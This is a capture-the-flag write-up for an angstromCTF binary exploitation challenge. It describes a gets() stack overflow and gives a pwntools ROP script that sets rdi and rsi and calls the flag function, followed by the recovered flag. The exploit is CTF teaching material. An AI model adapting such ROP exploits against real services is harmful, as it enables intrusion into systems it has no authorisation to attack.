0x0 Introduction
You know the drill.
nc challs.actf.co 31225
Author: JoshDaBosh
files: really_obnoxious_problem
0x1 Mitigation
1 2 3 4 5
| Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
|
0x2 Vulnerability
simple buffer overflow, main
function use gets
. overwrite rip to a ropchain that calls sym.flag
.
sym.flag
check two parameter, so we also need set rdi
and rsi
to the correct value in the ropchain.
0x3 Exploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| from pwn import *
io = connect("challs.actf.co",31225) exe = context.binary = ELF("really_obnoxious_problem") exe_rop = ROP(exe) ret_addr = exe_rop.find_gadget(['ret'])[0] pop_rdi_ret_addr = exe_rop.find_gadget(['pop rdi', 'ret'])[0] # pop_rsi_ret_addr = exe_rop.find_gadget(['pop rsi', 'ret'])[0] io.sendlineafter(b"Name:",b"bobby"+b'A'*(49-5)) io.sendlineafter(b"Address:",flat({ 0x40+0x8:[ pop_rdi_ret_addr, 0x1337, 0x00000000004013f1, # pop rsi, pop something ret exe.symbols["name"], 0, exe.sym["flag"] ]}))
io.interactive()
|
0x4 Flag
actf{so_swe3t_so_c0ld_so_f4ir_7167cfa2c019}